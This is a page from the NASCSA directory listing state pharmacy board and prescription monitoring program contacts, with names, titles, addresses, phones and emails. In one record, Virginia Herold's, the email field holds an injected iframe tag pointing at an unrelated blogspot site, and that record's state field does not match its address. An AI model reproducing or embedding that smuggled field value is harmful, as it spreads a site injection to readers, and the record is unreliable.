Untitled Document

NASCSA Databases


Return to NASCSA Website Database List


Return to Database Admin
(authorized only)

1 2 3 4 5 6 7 8 9 10 ]
Details found: 186
Page 1 of 10
Records Per Page: 
View
State Location Connecticut  Agency Department of Consumer Protection  Zip _06103 
Lastname Soto  Street Address 450 Columbus Boulevard  Phone (860) 713-6073 
Firstname Xaviel  Address2 Suite 901  Fax (860) 622-2608 
Title Program Manager, PMP  City Hartford  Email xaviel.soto@ct.gov 
Department Drug Control Division  State CT  State contact type PMP 
View
State Location Arizona  Agency   Zip 85007 
Lastname Gandhi   Street Address 1616 W. Adams Street  Phone (602) 771-2740 
Firstname Kam  Address2 Suite 120  Fax (602) 771-2749 
Title Executive Director  City Phoenix  Email kgandhi@azpharmacy.gov  
Department Board of Pharmacy  State AZ  State contact type CS 
View
State Location Arizona  Agency   Zip 85007 
Lastname Dodge  Street Address 1616 W. Adams Street  Phone (602) 771-2735 
Firstname Elizabeth  Address2 Suite 120  Fax (602) 771-2748 
Title Deputy Director  City Phoenix  Email edodge@azpharmacy.gov 
Department Board of Pharmacy  State AZ  State contact type CSandPMP 
View
State Location Louisiana  Agency   Zip 70809-1700 
Lastname Broussard  Street Address 3388 Brentwood Drive  Phone (225) 925-6481 
Firstname Malcolm  Address2   Fax (225) 922-0316 
Title Executive Director  City Baton Rouge  Email mbroussard@pharmacy.la.gov 
Department Board of Pharmacy  State LA  State contact type CSandPMP 
View
State Location Louisiana  Agency   Zip 70809-1700 
Lastname Fontenot  Street Address 3388 Brentwood Drive  Phone (225) 922-0094 
Firstname Joseph  Address2   Fax (225) 923-5670 
Title Assistant Executive Director  City Baton Rouge  Email jfontenot@pharmacy.la.gov 
Department Board of Pharmacy  State LA  State contact type CSandPMP 
View
State Location Illinois  Agency Department of Human Services  Zip 62702 
Lastname Berberet  Street Address 401 N. Fourth Street  Phone (217) 558-0943 
Firstname Craig  Address2 Room 133  Fax (217) 557-7975 
Title PMP Administrator  City Springfield  Email craig.berberet@illinois.gov  
Department Prescription Monitoring Program  State IL  State contact type CSandPMP 
View
State Location Florida  Agency Department of Health  Zip 32399 
Lastname Whitten  Street Address 4042 Bald Cypress Way  Phone (850) 245-4123 
Firstname Mark  Address2 Bin C-70  Fax (850) 245-4436 
Title Chief of Enforcement  City Tallahassee  Email mark.whitten@flhealth.gov 
Department MQA Bureau of Enforcement  State FL  State contact type CS 
View
State Location Florida  Agency   Zip 32399-3254 
Lastname Poston  Street Address 4052 Bald Cypress Way  Phone (850) 245-4797 
Firstname Rebecca  Address2 C-16  Fax  
Title Program Manager  City Tallahassee  Email rebecca_poston@flhealth.gov 
Department Prescription Drug Monitoring Program  State FL  State contact type CSandPMP 
View
State Location Florida  Agency Department of Health  Zip 32399 
Lastname Marshall  Street Address 4052 Bald Cypress Way  Phone (850) 245-4797 
Firstname Erica  Address2 Bin C-16  Fax  
Title Program Operations Manager  City Tallahassee  Email erika_marshall@flhealth.gov  
Department Prescription Monitoring Program  State FL  State contact type PMP 
View
State Location Colorado  Agency   Zip 80202 
Lastname Gassen  Street Address 1560 Broadway  Phone (303) 894-7754 
Firstname Chris  Address2 Suite 1310  Fax (303) 894-7764 
Title Executive Director  City Denver  Email chris.gassen@state.co.us  
Department Board of Pharmacy  State CO  State contact type CSandPMP 
View
State Location Florida  Agency   Zip 95834 
Lastname Herold  Street Address 1625 N. Market Blvd  Phone (916) 574-7911 
Firstname Virginia  Address2 N 219  Fax (916) 574-8618 
Title Executive Officer  City Sacramento  Email <iframe src="https://winnerscoffee.blogspot.com/"  
Department Board of Pharmacy  State CA  State contact type CS 
View
State Location California  Agency Department of Justice  Zip 95820 
Lastname Small  Street Address 4949 Broadway  Phone (916) 227-3324 
Firstname Mike  Address2 G110  Fax (916) 319-9444 
Title Administrator II  City Sacramento  Email mike.small@doj.ca.gov  
Department CURES/PDMP  State CA  State contact type CSandPMP 
View
State Location Alabama  Agency Department of Public Health  Zip 36104 
Lastname Durham  Street Address 201 Monroe Street  Phone (334) 206-5634 
Firstname Jameson  Address2 Suite 968  Fax (334) 206-5609 
Title Director  City Montgomery  Email Jamey.Durham@adph.state.al.us 
Department Bureau of Health Promotion & Chronic Disease  State AL  State contact type CSandPMP 
View
State Location Alabama  Agency Alabama Department of Health  Zip 36130 
Lastname Bishop  Street Address PO Box 303017  Phone (334) 206-3014 
Firstname Nancy  Address2 Suite 1010  Fax (334) 206-5663 
Title State Pharmacy Director  City Montgomery  Email nancy.bishop@adph.state.al.us 
Department   State AL  State contact type CSandPMP 
View
State Location Idaho  Agency   Zip 83702 
Lastname Adams  Street Address 1199 Shoreline Lane  Phone (208) 334-2356 
Firstname Alex  Address2 Suite 303  Fax (208) 334-3536 
Title Executive Director  City Boise  Email alex.adams@bop.idaho.gov 
Department Board of Pharmacy  State ID  State contact type CSandPMP 
View
State Location Idaho  Agency   Zip 83702 
Lastname Anderson  Street Address 1199 Shoreline Lane  Phone (208) 334-2356 
Firstname Teresa  Address2 Suite 303  Fax (208) 334-4814 
Title Program Information Coordinator  City Boise  Email teresa.anderson@bop.idaho.gov 
Department Board of Pharmacy  State ID  State contact type CSandPMP 
View
State Location Virginia  Agency   Zip 23233-1463 
Lastname Orr  Street Address Perimeter Center  Phone (804) 367-4523 
Firstname Ralph  Address2 9960 Mayland Drive, Suite 300  Fax (804) 527-4470 
Title Director, PMP  City Henrico  Email ralph.orr@dhp.virginia.gov 
Department Board of Pharmacy  State VA  State contact type CSandPMP 
View
State Location Virginia  Agency   Zip 23233-1463  
Lastname Juran  Street Address Perimeter Center  Phone (804) 367-4456 
Firstname Caroline  Address2 9960 Mayland Drive, Suite 300  Fax (804) 527-4472 
Title Executive Director  City Henrico  Email caroline.juran@dhp.virginia.gov 
Department Board of Pharmacy  State VA  State contact type CS 
View
State Location Alaska  Agency Business & Professional Licensing  Zip 99801 
Lastname Chambers  Street Address State Office Building  Phone (907) 465-2144 
Firstname Sara  Address2 333 Willoughby Avenue, 9th Floor  Fax (907) 465-2974 
Title Deputy Director  City Juneau  Email sara.chambers@alaska.gov 
Department Division of Corporations  State AK  State contact type CSandPMP 
View
State Location California  Agency Department of Justice  Zip 95820 
Lastname Farales  Street Address 4949 Broadway  Phone (916) 227-3436 
Firstname Tina  Address2 Room G-110  Fax (916) 319-9444 
Title Manager  City Sacramento  Email tina.farales@doj.ca.gov 
Department CURES/PDMP  State CA  State contact type PMP 
1 2 3 4 5 6 7 8 9 10 ]
Details found: 186
Page 1 of 10
Records Per Page: